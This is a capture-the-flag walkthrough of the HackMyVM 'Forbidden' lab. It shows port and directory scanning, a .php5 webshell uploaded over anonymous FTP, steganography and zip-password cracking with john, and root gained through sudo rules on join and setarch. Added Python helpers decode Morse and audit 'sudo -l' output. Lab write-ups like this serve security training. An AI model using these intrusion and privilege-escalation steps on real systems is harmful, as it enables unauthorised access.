HackmyVM-Forbidden


Information gathering

┌──(root㉿kali)-[~/Desktop/tmp/forbidden]
└─# nmap 192.168.31.224 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 00:18 EDT
Nmap scan report for 192.168.31.224
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
MAC Address: 08:00:27:C3:73:5D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.14 seconds

The web page is just a paragraph of text:

SECURE WEB/FTP
Hi, Im the best admin of the world. You cannot execute .php code on this server so you cannot obtain a reverse shell. Not sure if its misconfigured another things... but the importart is that php is disabled. -marta

Run a directory scan:

┌──(root㉿kali)-[~/Desktop/tmp/forbidden]
└─# gobuster dir -u "http://192.168.31.224/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.224/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 241]
/robots.txt (Status: 200) [Size: 10]
/note.txt (Status: 200) [Size: 75]

robots.txt points to note.txt:

The extra-secured .jpg file contains my password but nobody can obtain it.


Scanning for the jpg file on the web server turns up nothing.

Anonymous FTP login

Looking at the FTP service, anonymous login is allowed:

ftp> ls
229 Entering Extended Passive Mode (|||27129|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Oct 09 2020 www
226 Directory send OK.

There is a www folder. After uploading many different files, I found that only the .php5 extension gets parsed by the web server; I then connected with AntSword (蚁剑).

jpg steganography

Then I found a jpg file. Combining that with the earlier note.txt, I ran stegseek against the jpg, which extracted an archive; then I brute-forced the archive password:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# zip2john TOPSECRETIMAGE.jpg.out>pas
ver 2.0 efh 5455 efh 7875 TOPSECRETIMAGE.jpg.out/pass.txt PKZIP Encr: TS_chk, cmplen=66, decmplen=71, crc=E22A2397 ts=9831 cs=9831 type=8

┌──(root㉿kali)-[~/Desktop/tmp]
└─# john pas -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secret (TOPSECRETIMAGE.jpg.out/pass.txt)
1g 0:00:00:00 DONE (2025-06-12 01:45) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password is secret; extract the archive:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat pass.txt
- .... .
.--. .- ... ... .-- --- .-. -..
.. ... ---...
# Morse decoded: THE PASSWORD IS:

vGffXfDreF453!
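
The Morse decoding step above can be done programmatically. The following is an added Python example (not code from the original writeup) that decodes the three lines of pass.txt exactly as shown on the page, using the standard ITU Morse table; each line of the file is treated as one word, which is the layout the file uses.

```python
# Morse decoder for the pass.txt recovered above.
# Added example, not part of the original writeup; PASS_TXT is copied from
# the `cat pass.txt` output shown on the page.

MORSE_TABLE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "---...": ":", ".-.-.-": ".", "--..--": ",", "..--..": "?", "-....-": "-",
    "-..-.": "/", ".--.-.": "@", "-.--.": "(", "-.--.-": ")",
}

# The three lines of pass.txt as printed on the page.
PASS_TXT = """- .... .
.--. .- ... ... .-- --- .-. -..
.. ... ---..."""


def decode_morse_line(line):
    """Decode one line of Morse. Symbols are separated by single spaces,
    words by three spaces or a slash. Unknown symbols become '?' so a
    transcription error is visible instead of silently dropped."""
    words = []
    for word in line.replace("/", "   ").split("   "):
        letters = [MORSE_TABLE.get(sym, "?") for sym in word.split() if sym]
        words.append("".join(letters))
    return " ".join(w for w in words if w)


def decode_morse(text):
    """Decode a multi-line message where every non-empty line is one word,
    which is how pass.txt is laid out."""
    return " ".join(decode_morse_line(l) for l in text.splitlines() if l.strip())


if __name__ == "__main__":
    print(decode_morse(PASS_TXT))  # THE PASSWORD IS:
```

Note that "D" is "-..", whereas "6" would be "-...."; keeping unknown symbols as "?" rather than guessing makes that kind of mistranscription obvious.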

Get a reverse shell from the webshell.

Privilege escalation

Looking at the passwd file shows three users:

markos:x:1001:1001:,,,:/home/markos:/bin/bash
peter:x:1002:1002:,,,:/home/peter:/bin/bash
marta:x:1000:1000:marta,,,:/home/marta:/bin/bash

The password vGffXfDreF453! from the note did not work for any of these users; I finally learned from someone else's blog that the jpg file's name is marta's password.

Arbitrary file read

After switching to the user, check sudo -l:

marta@forbidden:~$ sudo -l
Matching Defaults entries for marta on forbidden:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marta may run the following commands on forbidden:
(ALL : ALL) NOPASSWD: /usr/bin/join

join can be used to read files; read the shadow file and then crack the hashes with john:

boomer           (peter)

The cracked password for peter is boomer.

setarch privilege escalation

peter@forbidden:/home/marta$ sudo -l
Matching Defaults entries for peter on forbidden:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on forbidden:
(ALL : ALL) NOPASSWD: /usr/bin/setarc
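
Both escalation steps on this box come from the same sudoers mistake: a password-less rule on a general-purpose binary with no argument restriction. The following is an added Python example (not code from the original writeup) that parses `sudo -l` output and flags rules a reviewer should look at. SAMPLE_OUTPUTS reproduces the two listings shown on this page for marta and peter (the peter rule is spelled out as /usr/bin/setarch, the binary the writeup actually invokes in the final step); the regex and the risk criteria are this example's own assumptions about the sudo output format.

```python
# Audit helper for `sudo -l` output: lists every command rule and flags the
# ones that run without a password, as any target user, or with unrestricted
# arguments. Added example, not from the original writeup.
import re

# Constructed sample input: the two sudo -l listings shown on this page.
SAMPLE_OUTPUTS = {
    "marta": r"""Matching Defaults entries for marta on forbidden:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marta may run the following commands on forbidden:
    (ALL : ALL) NOPASSWD: /usr/bin/join
""",
    "peter": r"""Matching Defaults entries for peter on forbidden:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on forbidden:
    (ALL : ALL) NOPASSWD: /usr/bin/setarch
""",
}

# A rule line looks like "(runas_user : runas_group) TAG: TAG: command args".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)


def parse_sudo_l(output):
    """Return a list of {runas, nopasswd, command} dicts. Only lines after the
    'may run the following commands' header are treated as rules; the
    Defaults block above it is ignored."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "command": m.group("cmd").strip(),
        })
    return rules


def risky_rules(output):
    """Rules worth reviewing, with the reasons: password-less, allowed to run
    as any target user (ALL), or a bare path with no pinned arguments (which
    lets the caller pass whatever arguments the binary accepts)."""
    findings = []
    for r in parse_sudo_l(output):
        reasons = []
        if r["nopasswd"]:
            reasons.append("NOPASSWD")
        if r["runas"].split(":")[0].strip() == "ALL":
            reasons.append("runas ALL")
        if " " not in r["command"] and r["command"] != "ALL":
            reasons.append("unrestricted arguments")
        if reasons:
            findings.append((r["command"], reasons))
    return findings


if __name__ == "__main__":
    for user, out in SAMPLE_OUTPUTS.items():
        for cmd, reasons in risky_rules(out):
            print(f"{user}: {cmd} -> {', '.join(reasons)}")
```

Run against the page's two listings it reports both /usr/bin/join and /usr/bin/setarch with all three reasons. The fix on the defending side is the inverse of each reason: drop NOPASSWD, restrict the runas target, and pin the exact arguments in sudoers rather than granting a bare binary that can read arbitrary files or run another program.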

Then escalate with setarch:

peter@forbidden:/home/marta$ uname -m
x86_64
peter@forbidden:/home/marta$ sudo setarch x86_64 /bin/bash
root@forbidden:/home/marta#